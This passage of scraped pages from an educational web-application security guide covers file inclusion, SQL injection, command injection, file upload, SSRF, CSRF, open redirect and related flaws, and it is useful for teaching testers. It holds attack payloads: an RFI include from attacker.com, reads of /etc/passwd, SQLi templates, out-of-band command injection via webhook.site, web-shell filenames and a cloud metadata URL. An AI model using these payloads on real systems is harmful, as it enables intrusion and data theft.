extensions * Can we bypass with null byte? %00 * Encoding * Double encoding * URL encoding * Unicode encoding * Test for remote file inclusion (RFI) Can you host a file remotely and include it? * Other weird bypasses * ../../ in the middle of the path [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion#exploitation) Exploitation -------------------------------------------------------------------------------------------------------------------------------------- Basic file inclusion Using PHP filter for base64 encoding of the file Log poisoning RFI (if allow\_url\_include is on) [PreviousFile Inclusion](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion) [NextDirectory traversal](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion#checklist) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion#exploitation) Was this helpful? Copy ../../../etc/passwd Copy php://filter/read=convert.base64-encode/resource=index.php Copy ../../../var/log/apache2/access.log Copy http://attacker.com/malicious.txt --- # Template injection | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection#what-is-it) What is it? ------------------------------------------------------------------------------------------------------------------ Template Injection attacks occur when an attacker can inject malicious input into template expressions, causing the application to execute unintended instructions. These attacks exploit weaknesses in the way applications interpret template expressions, often leading to remote code execution or data exposure. Template engines are used in various programming languages and frameworks to dynamically generate HTML, XML, or other output formats. While they often have sandboxing features to limit the effects of template injection, these can sometimes be bypassed. There are many types of Template Injection, which can occur in different template engines, including: * Server-side Template Injection (SSTI) * AngularJS Template Injection * Jinja2 Template Injection * Twig Template Injection * Freemarker Template Injection * Django Template Injection [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection#detection) Detection --------------------------------------------------------------------------------------------------------------- Copy ${3*3} ${3*'3'} ${{3*3}} #{3*3} *{3*3} {{3*3}} <%= 3*3 %> [PreviousBlind XXE](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection/blind-xxe) [NextServer-side template injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection/server-side-template-injection) Last updated 3 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection#what-is-it) * [Detection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection#detection) Was this helpful? --- # Detection | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection.md) . Mostly SQL injection vulnerabilities can be found using modern scanners. However, for more complex scenarios such as second-order SQLi, manual testing can also be used. The goal with many of these tests is to invoke some behaviour change in the application. Be sure to closely monitor for: * Content-Length header changes * Error messages * Changes in the data returned * Delays * Second-order (i.e. you inject somewhere, but another interaction is required to trigger the payload) ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#test-cases) Test cases: * Test with single and double quotes * Test with comments or terminators to mask the rest of the query * Test with other special characters that can manipulate SQL statements * Test with boolean conditions `and 1=1` and `and 1=2` (closely monitor the application response, in particular the Content-Length header) * Test with functions that cause time delays * MySQL `sleep(5)` * PostgreSQL `pg_sleep(5)` * MS SQL Server `WAITFOR DELAY '0:0:05'` * Oracle `dbms_pipe.receive_message(('x'),5)` * Test with out-of-band (OOB) or out-of-band application security testing (OAST) techniques * Test for stacked queries * Test for `UNION` keyword * `SELECT username,password FROM users UNION SELECT null,null` * Test for the number of columns using `null,null` or `ORDER BY 1` , `ORDER BY 2` * Test the data types with `'a',1` etc * Test with different encoding techniques * Test evasion techniques * Test with encoded payloads * Test with builting functions * E.g. `CHAR()` * Test ways to bypass commonly filtered characters * E.g. replacing space with `/**/` ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#detection-syntax) Detection syntax #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#general) General #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#mysql) MySQL #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#postgesql) PostgeSQL #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#oracle) Oracle ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#mssql) MSSQL ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#other-payloads) Other Payloads ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#tools) Tools: #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#sqlmap) SQLmap The easiest way to get started with SQLmap is to either save a request to a file or copy a request as curl and change the curl command to sqlmap. ![](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2F86304134-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F7lI1MQhaUuVEjnryWVD9%252Fuploads%252FpPGpQqWvSFx8k9WKoBYk%252Fsqli-copy-curl.png%3Falt%3Dmedia%26token%3Dd980ee31-b7b2-4b4f-8b52-60851170b5d3&width=768&dpr=3&quality=100&sign=237045f4&sv=2) Copying a request as cURL [PreviousSQL injection overview](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview) [NextBlind SQLi](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli) Last updated 1 year ago Was this helpful? * [Test cases:](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#test-cases) * [Detection syntax](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#detection-syntax) * [MSSQL](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#mssql) * [Other Payloads](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#other-payloads) * [Tools:](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection#tools) Was this helpful? Copy {payload}-- {payload};-- {payload}# '||{payload}-- '||{payload}# "{payload}-- "{payload}# ' AND {payload}-- ' OR {payload}-- ' AND EXISTS({payload})-- ' OR EXISTS({payload})-- Copy ' UNION ALL SELECT {payload}-- ' UNION SELECT {payload}-- ' OR (SELECT {payload}) IS NOT NULL-- ' OR (SELECT {payload}) IS NULL-- '||{payload}-- "||{payload}-- '||(SELECT {payload})-- "||(SELECT {payload})-- Copy ' UNION ALL SELECT {payload}-- ' UNION SELECT {payload}-- ' OR (SELECT {payload}) IS NOT NULL-- ' OR (SELECT {payload}) IS NULL-- Copy ' UNION ALL SELECT {payload} FROM dual-- ' UNION SELECT {payload} FROM dual-- ' OR (SELECT {payload} FROM dual) IS NOT NULL-- ' OR (SELECT {payload} FROM dual) IS NULL-- '||({payload})-- '||{payload}||'-- "||{payload}||"-- '||(SELECT {payload} FROM dual)-- Copy ' UNION ALL SELECT {payload}-- ' UNION SELECT {payload}-- ' OR (SELECT {payload}) IS NOT NULL-- ' OR (SELECT {payload}) IS NULL-- '+{payload}+ "+{payload}+ '+'+(SELECT {payload})+ "+"+(SELECT {payload})+ Copy OR {payload}=1 AND {payload}=1 AND IF({payload}, SLEEP(5), 1) AND CASE WHEN {payload} THEN sleep(5) ELSE NULL END AND {payload} AND NOT {payload} AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('Error:',{payload},0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Copy # Original curl request curl 'http://localhost/labs/i0x01.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-GB,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://localhost' -H 'Connection: keep-alive' -H 'Referer: http://localhost/labs/i0x01.php' -H 'Cookie: csrf0x02=jeremy' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-User: ?1' --data-raw 'username=jeremy' # Update 'curl' to 'sqlmap' and optionally add sqlmap flags sqlmap 'http://localhost/labs/i0x01.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-GB,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://localhost' -H 'Connection: keep-alive' -H 'Referer: http://localhost/labs/i0x01.php' -H 'Cookie: csrf0x02=jeremy' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-User: ?1' --data-raw 'username=jeremy' --- # Java | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/java.md) . [PreviousPHP](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/php) [NextPython](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/python) Last updated 3 years ago Was this helpful? Was this helpful? --- # Command injection | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection#what-is-it) What is it? ----------------------------------------------------------------------------------------------------------------- Command injection is a vulnerability that allows an attacker to manipulate an application to execute arbitrary system commands on the server. This occurs when an application passes unsafe data, often user input, to a system shell. **A simple example** A vulnerable web application might take a path from a query parameter and use it to read a file, like so: Copy $file = $_GET['file']; system("cat /var/www/html/$file"); If an attacker uses a payload such as `; ls -la` in the `file` parameter, they can make the application execute an additional command that lists all files in the current directory. The server then executes the `cat` command and the `ls` command and the attacker receives a list of all files in the current directory. Command injection can often lead to: * Remote code execution * Denial of Service * Data breach * Privilege escalation **Other learning resources:** * PortSwigger: [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection) * OWASP: [https://owasp.org/www-community/attacks/Command\_Injection](https://owasp.org/www-community/attacks/Command_Injection) **Writeups:** * Bullets [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection#checklist) Checklist -------------------------------------------------------------------------------------------------------------- * Determine the technology stack: Which operating system and server software are in use? * Identify potential injection points: URL parameters, form fields, HTTP headers, etc. * Test for simple injections with special characters like ;, &&, ||, and |. Test for injection within command arguments. * Test for blind command injection, where output is not returned in the response. If output isn't directly visible, try creating outbound requests (e.g. using ping or curl). * Try to escape from any restriction mechanisms, like quotes or double quotes. * Test with a list of potentially dangerous functions/methods (like exec(), system(), passthru() in PHP, or exec, eval in Node.js). * Test for command injection using time delays (ping -c localhost). * Test for command injection using &&, ||, and ;. * Test with common command injection payloads, such as those from PayloadsAllTheThings. * If there's a filter in place, try to bypass it using various techniques like encoding, command splitting, etc. [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection#exploitation) Exploitation -------------------------------------------------------------------------------------------------------------------- Basic command chaining Using logic operators Commenting out the rest of a command Using a pipe for command chaining Testing for blind injection Out-of-band testing [PreviousDirectory traversal](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal) [NextXXE (XML external entity) injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection#checklist) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection#exploitation) Was this helpful? Copy ; ls -la Copy && ls -la Copy ; ls -la # Copy | ls -la Copy ; sleep 10 ; ping -c 10 127.0.0.1 & whoami > /var/www/html/whoami.txt & Copy & nslookup webhook.site/?`whoami` & --- # Authentication | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication#what-is-it) What is it? -------------------------------------------------------------------------------------------------------------- Authentication is the process by which a system confirms the identity of a user or application. It's essentially all about **who you are**. Targeting authentication mechanisms allow us to to impersonate users, admins, or systems and gain unauthorized access. Often, we look to attack logic issues and lack of brute-force protection. Common targets in authentication attacks include: * Passwords or passphrases * Multi-Factor Authentication (MFA) * Session tokens * Cookies * Recovery questions and answers For more details on specific authentication attack techniques, see the relevant child pages. [PreviousClient-side template injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection/client-side-template-injection) [NextAttacking password-based authentication](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-password-based-authentication) Last updated 2 years ago Was this helpful? Was this helpful? --- # Insecure file upload | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-file-upload.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-file-upload#what-is-it) What is it? -------------------------------------------------------------------------------------------------------------------- Insecure File Upload vulnerability is when an application allows uncontrolled and unvalidated upload of files. An attacker can exploit this vulnerability to upload malicious files, like web shells, which can lead to code execution, data leakage, or other types of attacks. **A simple example** An application allows users to upload profile pictures without validating the file type and content, or without properly handling the file storage. An attacker can upload a PHP shell script disguised as an image file. When this file is served by the server, the malicious script can be executed. The impact of insecure file uploads includes: * Remote Code Execution (RCE) * Data Leakage * Server Compromise **Other learning resources:** * OWASP: https://owasp.org/www-community/vulnerabilities/Unrestricted\_File\_Upload * Swisskyrepo: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-file-upload#checklist) Checklist ----------------------------------------------------------------------------------------------------------------- * Understand the file upload functionality * Are there file type restrictions? * Are there file size restrictions? * Are files renamed after upload? * Are files checked for content type matching the extension? * Test for bypassing file extension filters * Upload a file with a double extension (e.g., .jpg.php) * Upload a file with a null byte injection (e.g., .php%00.jpg) * Test for malicious content within a file * Upload a file with a simple XSS payload in its content * Test for inadequate file storage handling * Are uploaded files accessible from the internet? (Path/URL guessing) * Can other users access the uploaded files? [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-file-upload#exploitation) Exploitation ----------------------------------------------------------------------------------------------------------------------- [PreviousServer-side request forgery (SSRF)](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/server-side-request-forgery-ssrf) [NextClickjacking](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/clickjacking) Last updated 3 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-file-upload#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-file-upload#checklist) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-file-upload#exploitation) Was this helpful? Copy # Bypass extension filters # Note: req server misconfig to execute or the ability to rename once it's up shell.php.jpg # Null byte injection shell.php%00.jpg # Blocklist bypass shell.php5 shell.phtml --- # PHP | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/php.md) . [PreviousInsecure deserialization](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization) [NextJava](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/java) Last updated 3 years ago Was this helpful? Was this helpful? --- # Server-side request forgery (SSRF) | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/server-side-request-forgery-ssrf.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/server-side-request-forgery-ssrf#what-is-it) What is it? -------------------------------------------------------------------------------------------------------------------------------- Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. It can be used by an attacker to interact with internal systems, possibly bypassing firewalls or accessing unauthorized data. **A simple example** A vulnerable web application uses a parameter to retrieve an image from a URL, i.e., `/loadImage?url={imageURL}`. An attacker can potentially change the `{imageURL}` to point to internal resources that should not be exposed, such as `http://localhost/admin` or `http://internal-service/api/secrets`. The impact of an SSRF vulnerability includes: * Access to internal services and data * Remote code execution * Denial of Service (DoS) **Other learning resources:** * PortSwigger: https://portswigger.net/web-security/ssrf * Swisskyrepo: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/server-side-request-forgery-ssrf#checklist) Checklist ----------------------------------------------------------------------------------------------------------------------------- * Identify all points where the application makes a server-side HTTP request * URL parameters * Form fields * HTTP headers * Examine the application's handling of URL redirection * Test different URI schemes http, https, file, ftp, etc. * Does the application accept IP addresses (e.g., 127.0.0.1) or localhost as the hostname? * Test for internal network interactions * Can you map out the internal network infrastructure (port scanning, banner grabbing)? * Test for remote file inclusion * Test for cloud metadata exposure (relevant for cloud-based services) Amazon AWS, Google Cloud, etc. * Is there a blocklist? * Can you bypass the blocklist? * Encoding Hostname obfuscation * Alternative IP notation (e.g. 127.0.0.1 in hex is 0x7f.0x0.0x0.0x1) * Hex, Hex with extra 0s, Octal, two numbers, three numbers, etc [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/server-side-request-forgery-ssrf#exploitation) Exploitation ----------------------------------------------------------------------------------------------------------------------------------- [Previous.NET](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/.net) [NextInsecure file upload](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-file-upload) Last updated 3 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/server-side-request-forgery-ssrf#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/server-side-request-forgery-ssrf#checklist) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/server-side-request-forgery-ssrf#exploitation) Was this helpful? Copy # Basic internal interaction http://localhost/admin # Using alternative IP notation (for 127.0.0.1) http://2130706433 # Cloud metadata exposure (AWS) http://169.254.169.254/latest/meta-data/ --- # Cross-Site Request Forgery (CSRF) | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/cross-site-request-forgery-csrf.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/cross-site-request-forgery-csrf#what-is-it) What is it? ------------------------------------------------------------------------------------------------------------------------------- CSRF, short for Cross-site request forgery, is a type of web security flaw that enables an attacker to trick users into executing actions they didn't intend to do. **A simple example:** * A vulnerable web application has the endpoint `/updateProfile?id={userid}` * When a `POST` request is made to this endpoint the application: * Checks the ID is the current user * If it is, update the profile with the provided information in the request body * When the victim visits the attacker's malicious site, it will: * Send a request to the vulnerable web application * Because the user is logged into that application, the browser will include cookies (importantly, the session cookie) * The vulnerable application processes the request as normal since it came from the user It's important to note that we need some user interaction for CSRF to work. Typically an attacker would place their payload on a site that they control, and try to entice the target with phishing emails, direct messages on social media, etc. Once the user clicks the link and lands on the page, the payload is triggered. CSRF defences are now pretty common, so along with just finding places where users can carry out actions, we also need to be able to bypass defences that have not been properly implemented. **Other learning resources:** * PortSwigger: Web Security Academy [https://portswigger.net/web-security/csrf](https://portswigger.net/web-security/csrf) * The XSS Rat: Bug Bounty Beginner Methodology: CSRF [https://www.youtube.com/watch?v=uirJsgvN7Hc](https://www.youtube.com/watch?v=uirJsgvN7Hc) * Swisskeyrepo: [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/README.md) **Writeups:** [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/cross-site-request-forgery-csrf#checklist) Checklist ---------------------------------------------------------------------------------------------------------------------------- * Does every form have a CSRF token? * Can we use GET instead of POST (i.e. can our payload be in the URI instead of the body) * Test the token * Test without the token * Test other HTTP methods without the token (e.g. GET) * Test without the token value (keep the param name, e.g. &csrf=) * Test with a random token * Test a previous token * Test a token from a different session * Test with a token of the same length * Test for predictability * Test for static values * Test for known values (e.g. the token is the user-id) * Is the token tied to a cookie other than the session cookie? * Can the token be stolen with XSS? * Is the referer header being used to validate the request origin? * Do the cookies have SameSite set? (Chrome is lax by default) * Can we submit the request with GET? * Can we override HTTP methods with \`X-Http-Method-Override: GET\` * Can we override HTTP methods with \`\_method=POST\` [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/cross-site-request-forgery-csrf#exploitation) Exploitation ---------------------------------------------------------------------------------------------------------------------------------- [PreviousAuthentication lab setup & writeups](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/authentication-lab-setup-and-writeups) [NextInsecure deserialization](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization) Last updated 3 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/cross-site-request-forgery-csrf#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/cross-site-request-forgery-csrf#checklist) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/cross-site-request-forgery-csrf#exploitation) Was this helpful? Copy
Copy Click Me Copy Copy document.location = 'https:///employees/add?name='; --- # Open redirect | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/open-redirect.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/open-redirect#what-is-it) What is it? ------------------------------------------------------------------------------------------------------------- An Open Redirect Vulnerability allows an attacker to redirect a user to an arbitrary website of the attacker's choosing. It occurs when an application incorporates user-supplied data into a URL which causes a redirection to that URL. This can be used to facilitate phishing attacks, steal sensitive information, or perform other malicious activities. **A simple example** Consider a website that uses a URL parameter to redirect the user to a specified page. For example: http://website.com/redirect?site=http://some-site.com. An attacker could replace "http://some-site.com" with a malicious site, then trick a user into following the crafted link. Open Redirects can lead to: Phishing attacks Disclosure of sensitive information Malware installation Execution of arbitrary scripts Other learning resources: OWASP: https://owasp.org/www-community/attacks/Unvalidated\_Redirects\_and\_Forwards PortSwigger: https://portswigger.net/web-security/unvalidated-redirects [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/open-redirect#checklist) **Checklist** -------------------------------------------------------------------------------------------------------------- * Does the application use redirection functions that include user-supplied input? * Are redirects implemented without validation of the target URL? * Can an attacker manipulate the redirection URL to point to an arbitrary domain? * Does the application append user-supplied input into the URL causing the redirection? [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/open-redirect#exploitation) Exploitation ---------------------------------------------------------------------------------------------------------------- Craft an URL with redirection to a malicious site Copy http://website.com/redirect?site=http://malicious-site.com Trick the user into clicking the link [PreviousClickjacking](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/clickjacking) [NextVulnerable components](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/vulnerable-components) Last updated 3 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/open-redirect#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/open-redirect#checklist) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/open-redirect#exploitation) Was this helpful? Copy "You've won a prize! Click here to claim: http://website.com/redirect?site=http://malicious-site.com" --- # Insecure deserialization | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization#what-is-it) What is it? ------------------------------------------------------------------------------------------------------------------------ Insecure Deserialization attacks occur when an attacker is able to manipulate serialized (formatted for storage or transmission) objects in order to change the application's intended flow or to execute arbitrary code. These attacks exploit weaknesses in the way applications deserialize input data, typically by inserting malicious data that is interpreted as a valid object by the target system. Serialization is the process of turning an object into a format that can be transmitted or stored, and deserialization is the reverse process - turning serialized data back into an object. If an application doesn't properly validate or sanitize the serialized objects before deserializing them, it can lead to several types of attacks, such as: * Remote Code Execution (RCE) * Replay attacks * Injection attacks * Privilege escalation attacks Insecure deserialization can occur in any programming language that supports serialized objects, but some common languages where these vulnerabilities often occur include Java, PHP, Python, and .NET. For more details on specific insecure deserialization attacks and mitigations, see the relevant child pages. [PreviousCross-Site Request Forgery (CSRF)](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/cross-site-request-forgery-csrf) [NextPHP](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/php) Last updated 3 years ago Was this helpful? Was this helpful? --- # .NET | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/.net.md) . [PreviousPython](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/python) [NextServer-side request forgery (SSRF)](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/server-side-request-forgery-ssrf) Last updated 3 years ago Was this helpful? Was this helpful? --- # Authentication lab setup & writeups | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/authentication-lab-setup-and-writeups.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/authentication-lab-setup-and-writeups#lab-setup) Lab setup ------------------------------------------------------------------------------------------------------------------------------------------------- Coming soon [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/authentication-lab-setup-and-writeups#labs-list) Labs list ------------------------------------------------------------------------------------------------------------------------------------------------- #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/authentication-lab-setup-and-writeups#username-enumeration-via-different-responses) Username enumeration via different responses PortSwigger | free | easy | [link to lab](https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/authentication-lab-setup-and-writeups#solution) Copy 1. Send a login request, capture it in BURP and send to intruder 2. Mark the payload areas for the username and password in the body of the request username=§test§&password=§test§ 3. Select 'Cluster Bomb' 4. In payloads, load in the provided username list for the first list, and the provided passwords list for the second list 5. Click 'Start Attack' 6. Order the results by Status code or length to view the valid credentials 7. Use these credentials to login and solve the lab [PreviousAttacking MFA](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-mfa) [NextCross-Site Request Forgery (CSRF)](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/cross-site-request-forgery-csrf) Last updated 2 years ago Was this helpful? * [Lab setup](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/authentication-lab-setup-and-writeups#lab-setup) * [Labs list](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/authentication-lab-setup-and-writeups#labs-list) Was this helpful? --- # Python | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/python.md) . [PreviousJava](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/java) [Next.NET](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/.net) Last updated 3 years ago Was this helpful? Was this helpful? --- # XXE (XML external entity) injection | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection#what-is-it) What is it? --------------------------------------------------------------------------------------------------------------------------------- XML External Entity (XXE) vulnerabilities occur when an application processes XML input that includes a reference to an external entity. This vulnerability can occur in any technology that parses XML. By exploiting an XXE vulnerability, an attacker can read local files on the server, interact with 